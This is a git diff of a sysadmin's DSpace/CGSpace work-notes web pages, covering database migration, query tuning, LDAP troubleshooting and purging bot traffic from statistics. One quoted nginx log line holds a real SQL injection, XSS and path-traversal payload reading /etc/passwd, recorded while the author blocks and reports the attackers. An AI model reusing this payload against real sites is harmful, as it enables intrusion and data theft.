</span></span><span style="display:flex;"><span>$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7 -c <span style="color:#e6db74">&#34;DELETE FROM schema_version WHERE version IN (&#39;5.0.2017.09.25&#39;, &#39;6.0.2017.01.30&#39;, &#39;6.0.2017.09.25&#39;);&#34;</span>
</span></span></code></pre></div><ul>
<li>Now DSpace 7 starts with my CGSpace data&hellip; nice
<ul>
<li>The Discovery indexing still takes seven hours&hellip; fuck</li>
@ -469,11 +469,11 @@ $ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspac
<ul>
<li>Start a full Discovery reindex on my local DSpace 6.3 instance:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ /usr/bin/time -f %M:%e chrt -b <span style="color:#ae81ff">0</span> ~/dspace63/bin/dspace index-discovery -b
Loading @mire database changes for module MQM
Changes have been processed
836140:6543.6
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ /usr/bin/time -f %M:%e chrt -b <span style="color:#ae81ff">0</span> ~/dspace63/bin/dspace index-discovery -b
</span></span><span style="display:flex;"><span>Loading @mire database changes for module MQM
</span></span><span style="display:flex;"><span>Changes have been processed
</span></span><span style="display:flex;"><span>836140:6543.6
</span></span></code></pre></div><ul>
<li>So that&rsquo;s 1.8 hours versus 7 on DSpace 7, with the same database!</li>
<li>Several users wrote to me that CGSpace was slow recently
<ul>
@ -481,13 +481,13 @@ Changes have been processed
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_stat_activity&#39;</span> | wc -l
53
$ psql -c <span style="color:#e6db74">&#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | wc -l
1697
$ psql -c <span style="color:#e6db74">&#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name=&#39;dspaceWeb&#39;&#34;</span> | wc -l
1681
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_stat_activity&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>53
</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | wc -l
</span></span><span style="display:flex;"><span>1697
</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name=&#39;dspaceWeb&#39;&#34;</span> | wc -l
</span></span><span style="display:flex;"><span>1681
</span></span></code></pre></div><ul>
<li>Looking at Munin, I see there are indeed a higher number of locks starting on the morning of 2021-10-07:</li>
</ul>
<p><img src="/cgspace-notes/2021/10/postgres_locks_ALL-week.png" alt="PostgreSQL locks week"></p>
@ -516,71 +516,71 @@ $ psql -c <span style="color:#e6db74">&#34;SELECT * FROM pg_locks pl LEFT JOIN p
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace= &gt; SET pg_trgm.similarity_threshold = 0.5;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace= &gt; SET pg_trgm.similarity_threshold = 0.5;
</span></span></code></pre></div><ul>
<li>Next I experimented with using GIN or GiST indexes on <code>metadatavalue</code>, but they were slower than the existing DSpace indexes
<ul>
<li>I tested a few variations of the query I had been using and found it&rsquo;s <em>much</em> faster if I use the similarity operator and keep the condition that object IDs are in the item table&hellip;</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % &#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;;
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Time: 739.948 ms
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % &#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;;
</span></span><span style="display:flex;"><span> text_value │ dspace_object_id
</span></span><span style="display:flex;"><span>────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
</span></span><span style="display:flex;"><span> Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
</span></span><span style="display:flex;"><span>(1 row)
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Time: 739.948 ms
</span></span></code></pre></div><ul>
<li>Now this script runs in four minutes (versus twenty-four!) and it still finds the same seven duplicates! Amazing!</li>
<li>I still don&rsquo;t understand the differences in the query plan well enough, but I see it is using the DSpace default indexes and the results are accurate</li>
<li>So to summarize, the best to the worst query, all returning the same result:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace= &gt; SET pg_trgm.similarity_threshold = 0.6;
localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % &#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;;
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Time: 683.165 ms
Time: 635.364 ms
Time: 674.666 ms
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>localhost/dspace= &gt; DISCARD ALL;
localhost/dspace= &gt; SET pg_trgm.similarity_threshold = 0.6;
localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND text_value % &#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;;
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Time: 1584.765 ms (00:01.585)
Time: 1665.594 ms (00:01.666)
Time: 1623.726 ms (00:01.624)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>localhost/dspace= &gt; DISCARD ALL;
localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND SIMILARITY(text_value,&#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;) &gt; 0.6;
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Time: 4028.939 ms (00:04.029)
Time: 4022.239 ms (00:04.022)
Time: 4061.820 ms (00:04.062)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>localhost/dspace= &gt; DISCARD ALL;
localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,&#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;) &gt; 0.6;
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Time: 4358.713 ms (00:04.359)
Time: 4301.248 ms (00:04.301)
Time: 4417.909 ms (00:04.418)
</code></pre></div><h2 id="2021-10-13">2021-10-13</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace= &gt; SET pg_trgm.similarity_threshold = 0.6;
</span></span><span style="display:flex;"><span>localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % &#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;;
</span></span><span style="display:flex;"><span> text_value │ dspace_object_id
</span></span><span style="display:flex;"><span>────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
</span></span><span style="display:flex;"><span> Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
</span></span><span style="display:flex;"><span>(1 row)
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Time: 683.165 ms
</span></span><span style="display:flex;"><span>Time: 635.364 ms
</span></span><span style="display:flex;"><span>Time: 674.666 ms
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>localhost/dspace= &gt; DISCARD ALL;
</span></span><span style="display:flex;"><span>localhost/dspace= &gt; SET pg_trgm.similarity_threshold = 0.6;
</span></span><span style="display:flex;"><span>localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND text_value % &#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;;
</span></span><span style="display:flex;"><span> text_value │ dspace_object_id
</span></span><span style="display:flex;"><span>────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
</span></span><span style="display:flex;"><span> Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
</span></span><span style="display:flex;"><span>(1 row)
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Time: 1584.765 ms (00:01.585)
</span></span><span style="display:flex;"><span>Time: 1665.594 ms (00:01.666)
</span></span><span style="display:flex;"><span>Time: 1623.726 ms (00:01.624)
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>localhost/dspace= &gt; DISCARD ALL;
</span></span><span style="display:flex;"><span>localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND SIMILARITY(text_value,&#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;) &gt; 0.6;
</span></span><span style="display:flex;"><span> text_value │ dspace_object_id
</span></span><span style="display:flex;"><span>────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
</span></span><span style="display:flex;"><span> Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
</span></span><span style="display:flex;"><span>(1 row)
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Time: 4028.939 ms (00:04.029)
</span></span><span style="display:flex;"><span>Time: 4022.239 ms (00:04.022)
</span></span><span style="display:flex;"><span>Time: 4061.820 ms (00:04.062)
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>localhost/dspace= &gt; DISCARD ALL;
</span></span><span style="display:flex;"><span>localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,&#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;) &gt; 0.6;
</span></span><span style="display:flex;"><span> text_value │ dspace_object_id
</span></span><span style="display:flex;"><span>────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
</span></span><span style="display:flex;"><span> Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
</span></span><span style="display:flex;"><span>(1 row)
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Time: 4358.713 ms (00:04.359)
</span></span><span style="display:flex;"><span>Time: 4301.248 ms (00:04.301)
</span></span><span style="display:flex;"><span>Time: 4417.909 ms (00:04.418)
</span></span></code></pre></div><h2 id="2021-10-13">2021-10-13</h2>
<ul>
<li>I looked into the <a href="https://github.com/DSpace/DSpace/issues/7946">REST API issue where fields without qualifiers throw an HTTP 500</a>
<ul>
@ -640,11 +640,11 @@ Time: 4417.909 ms (00:04.418)
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ldapsearch -x -H ldaps://AZCGNEROOT3.CGIARAD.ORG:636/ -b <span style="color:#e6db74">&#34;dc=cgiarad,dc=org&#34;</span> -D <span style="color:#e6db74">&#34;booo&#34;</span> -W <span style="color:#e6db74">&#34;(sAMAccountName=fuuu)&#34;</span>
Enter LDAP Password:
ldap_bind: Invalid credentials (49)
additional info: 80090308: LdapErr: DSID-0C090447, comment: AcceptSecurityContext error, data 52e, v3839
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ldapsearch -x -H ldaps://AZCGNEROOT3.CGIARAD.ORG:636/ -b <span style="color:#e6db74">&#34;dc=cgiarad,dc=org&#34;</span> -D <span style="color:#e6db74">&#34;booo&#34;</span> -W <span style="color:#e6db74">&#34;(sAMAccountName=fuuu)&#34;</span>
</span></span><span style="display:flex;"><span>Enter LDAP Password:
</span></span><span style="display:flex;"><span>ldap_bind: Invalid credentials (49)
</span></span><span style="display:flex;"><span> additional info: 80090308: LdapErr: DSID-0C090447, comment: AcceptSecurityContext error, data 52e, v3839
</span></span></code></pre></div><ul>
<li>I sent a message to ILRI ICT to ask them to check the account
<ul>
<li>They reset the password so I ran all system updates and rebooted the server since users weren&rsquo;t able to log in anyways</li>
@ -664,17 +664,17 @@ ldap_bind: Invalid credentials (49)
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ http <span style="color:#e6db74">&#39;localhost:8081/solr/statistics/select?q=time%3A2021-04*&amp;fl=ip&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=ip&amp;facet.limit=200000&amp;facet.mincount=1&#39;</span> &gt; /tmp/2021-04-ips.json
# Ghetto way to extract the IPs using jq, but I can<span style="color:#960050;background-color:#1e0010">&#39;</span>t figure out how only print them and not the facet counts, so I just use sed
$ jq <span style="color:#e6db74">&#39;.facet_counts.facet_fields.ip[]&#39;</span> /tmp/2021-04-ips.json | grep -E <span style="color:#e6db74">&#39;^&#34;&#39;</span> | sed -e <span style="color:#e6db74">&#39;s/&#34;//g&#39;</span> &gt; /tmp/ips.txt
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-04-ips.csv
$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/2021-04-ips.csv | csvcut -c network | sed 1d | sort -u &gt; /tmp/networks-to-block.txt
$ wc -l /tmp/networks-to-block.txt
125 /tmp/networks-to-block.txt
$ grepcidr -f /tmp/networks-to-block.txt /tmp/ips.txt &gt; /tmp/ips-to-purge.txt
$ wc -l /tmp/ips-to-purge.txt
202
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ http <span style="color:#e6db74">&#39;localhost:8081/solr/statistics/select?q=time%3A2021-04*&amp;fl=ip&amp;wt=json&amp;indent=true&amp;facet=true&amp;facet.field=ip&amp;facet.limit=200000&amp;facet.mincount=1&#39;</span> &gt; /tmp/2021-04-ips.json
</span></span><span style="display:flex;"><span># Ghetto way to extract the IPs using jq, but I can<span style="color:#960050;background-color:#1e0010">&#39;</span>t figure out how only print them and not the facet counts, so I just use sed
</span></span><span style="display:flex;"><span>$ jq <span style="color:#e6db74">&#39;.facet_counts.facet_fields.ip[]&#39;</span> /tmp/2021-04-ips.json | grep -E <span style="color:#e6db74">&#39;^&#34;&#39;</span> | sed -e <span style="color:#e6db74">&#39;s/&#34;//g&#39;</span> &gt; /tmp/ips.txt
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-04-ips.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/2021-04-ips.csv | csvcut -c network | sed 1d | sort -u &gt; /tmp/networks-to-block.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/networks-to-block.txt
</span></span><span style="display:flex;"><span>125 /tmp/networks-to-block.txt
</span></span><span style="display:flex;"><span>$ grepcidr -f /tmp/networks-to-block.txt /tmp/ips.txt &gt; /tmp/ips-to-purge.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/ips-to-purge.txt
</span></span><span style="display:flex;"><span>202
</span></span></code></pre></div><ul>
<li>Attempting to purge those only shows about 3,500 hits, but I will do it anyways
<ul>
<li>Adding 64.39.108.48 from Qualys I get a total of 22631 hits purged</li>
@ -715,9 +715,9 @@ $ wc -l /tmp/ips-to-purge.txt
</code></pre><ul>
<li>Even more annoying, they are not re-using their session ID:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep 93.158.91.62 log/dspace.log.2021-10-29 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
4888
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep 93.158.91.62 log/dspace.log.2021-10-29 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>4888
</span></span></code></pre></div><ul>
<li>This IP has made 36,000 requests to CGSpace&hellip;</li>
<li>The IP is owned by <a href="internetvikings.com">Internet Vikings</a> in Sweden</li>
<li>I purged their statistics and set up a temporary HTTP 403 telling them to use a real user agent</li>
@ -729,17 +729,17 @@ $ wc -l /tmp/ips-to-purge.txt
<li>I added these two IPs to the nginx IP bot identifier</li>
<li>Jesus I found a few Russian IPs attempting SQL injection and path traversal, ie:</li>
</ul>
<pre tabindex="0"><code>45.9.20.71 - - [20/Oct/2021:02:31:15 +0200] &quot;GET /bitstream/handle/10568/1820/Rhodesgrass.pdf?sequence=4&amp;OoxD=6591%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1&quot; 200 143070 &quot;https://cgspace.cgiar.org:443/bitstream/handle/10568/1820/Rhodesgrass.pdf&quot; &quot;Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11&quot;
<pre tabindex="0"><code>45.9.20.71 - - [20/Oct/2021:02:31:15 +0200] &#34;GET /bitstream/handle/10568/1820/Rhodesgrass.pdf?sequence=4&amp;OoxD=6591%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1&#34; 200 143070 &#34;https://cgspace.cgiar.org:443/bitstream/handle/10568/1820/Rhodesgrass.pdf&#34; &#34;Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11&#34;
</code></pre><ul>
<li>I reported them to AbuseIPDB.com and purged their hits:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ip.txt -p
Purging 6364 hits from 45.9.20.71 in statistics
Purging 8039 hits from 45.146.166.157 in statistics
Purging 3383 hits from 45.155.204.82 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 17786
</code></pre></div><h2 id="2021-10-31">2021-10-31</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ip.txt -p
</span></span><span style="display:flex;"><span>Purging 6364 hits from 45.9.20.71 in statistics
</span></span><span style="display:flex;"><span>Purging 8039 hits from 45.146.166.157 in statistics
</span></span><span style="display:flex;"><span>Purging 3383 hits from 45.155.204.82 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 17786
</span></span></code></pre></div><h2 id="2021-10-31">2021-10-31</h2>
<ul>
<li>Update Docker containers for AReS on linode20 and run a fresh harvest</li>
<li>Found some strange IP (94.71.3.44) making 51,000 requests today with the user agent &ldquo;Microsoft Internet Explorer&rdquo;
@ -757,13 +757,13 @@ Purging 3383 hits from 45.155.204.82 in statistics
<li>That&rsquo;s from ASN 12552 (IPO-EU, SE), which is operated by Internet Vikings, though AbuseIPDB.com says it&rsquo;s <a href="availo.se">Availo Networks AB</a></li>
<li>There&rsquo;s another IP (3.225.28.105) that made a few thousand requests to the REST API from Amazon, though it&rsquo;s using a normal user agent</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zgrep 3.225.28.105 /var/log/nginx/rest.log.* | wc -l
3991
~# zgrep 3.225.28.105 /var/log/nginx/rest.log.* | grep -oE &#39;GET /rest/(collections|handle|items)&#39; | sort | uniq -c
3154 GET /rest/collections
427 GET /rest/handle
410 GET /rest/items
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zgrep 3.225.28.105 /var/log/nginx/rest.log.* | wc -l
</span></span><span style="display:flex;"><span>3991
</span></span><span style="display:flex;"><span>~# zgrep 3.225.28.105 /var/log/nginx/rest.log.* | grep -oE &#39;GET /rest/(collections|handle|items)&#39; | sort | uniq -c
</span></span><span style="display:flex;"><span> 3154 GET /rest/collections
</span></span><span style="display:flex;"><span> 427 GET /rest/handle
</span></span><span style="display:flex;"><span> 410 GET /rest/items
</span></span></code></pre></div><ul>
<li>It requested the <a href="https://cgspace.cgiar.org/handle/10568/75560">CIAT Story Maps</a> collection over 3,000 times last month&hellip;
<ul>
<li>I will purge those hits</li>

View File

@ -32,7 +32,7 @@ First I exported all the 2019 stats from CGSpace:
$ ./run.sh -s http://localhost:8081/solr/statistics -f &#39;time:2019-*&#39; -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -123,16 +123,16 @@ $ zstd statistics-2019.json
<li>I experimented with manually sharding the Solr statistics on DSpace Test</li>
<li>First I exported all the 2019 stats from CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json
</span></span></code></pre></div><ul>
<li>Then on DSpace Test I created a <code>statistics-2019</code> core with the same instance dir as the main <code>statistics</code> core (as <a href="https://wiki.lyrasis.org/display/DSDOC6x/Testing+Solr+Shards">illustrated in the DSpace docs</a>)</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ mkdir -p /home/dspacetest.cgiar.org/solr/statistics-2019/data
# create core in Solr admin
$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;time:2019-*&lt;/query&gt;&lt;/delete&gt;&#34;</span>
$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics-2019.json -k uid
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ mkdir -p /home/dspacetest.cgiar.org/solr/statistics-2019/data
</span></span><span style="display:flex;"><span># create core in Solr admin
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;time:2019-*&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics-2019.json -k uid
</span></span></code></pre></div><ul>
<li>The key thing above is that you create the core in the Solr admin UI, but the data directory must already exist so you have to do that first in the file system</li>
<li>I restarted the server after the import was done to see if the cores would come back up OK
<ul>
@ -165,13 +165,13 @@ $ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics
</ul>
</li>
</ul>
